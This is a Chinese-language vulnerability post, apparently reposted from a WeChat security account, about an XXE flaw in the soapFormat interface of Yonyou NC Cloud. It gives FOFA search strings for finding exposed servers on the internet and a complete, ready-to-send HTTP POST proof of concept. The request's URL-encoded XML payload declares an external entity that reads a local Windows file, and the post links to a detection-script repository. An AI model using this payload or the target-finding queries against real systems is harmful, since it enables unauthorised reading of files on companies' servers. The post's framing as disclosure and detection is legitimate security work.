用友NC Cloud soapFormat接口XXE漏洞
2023-12-28 07:3:3 Author: 网络安全透视镜(查看原文) 阅读量:42 收藏

一、漏洞描述

NC Cloud是用友推出的大型企业数字化平台。用友网络科技股份有限公司NC Cloud soapFormat接口存在XXE漏洞。

二、网络空间搜索引擎搜索

fofa查询

body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"

三、漏洞复现

POC

POST /uapws/soapFormat.ajax HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 366Connection: closeUpgrade-Insecure-Requests: 1
msg=%3C%21DOCTYPE+foo%5B%3C%21ENTITY+xxe1two+SYSTEM+%22file%3A%2F%2F%2FC%3A%2F%2Fwindows%2Fwin.ini%22%3E+%5D%3E%3Csoap%3AEnvelope+xmlns%3Asoap%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22%3E%3Csoap%3ABody%3E%3Csoap%3AFault%3E%3Cfaultcode%3Esoap%3AServer%26xxe1two%3B%3C%2Ffaultcode%3E%3C%2Fsoap%3AFault%3E%3C%2Fsoap%3ABody%3E%3C%2Fsoap%3AEnvelope%3E

四、漏洞检测

pocsuite3漏洞检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498854&idx=1&sn=d2984b332b88c99193afb466fe5f2d21&chksm=9688d9938fed2acd09900db4c145ee30bd682f704ba18f44a283184fe55a0e62f18eb4379d93&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh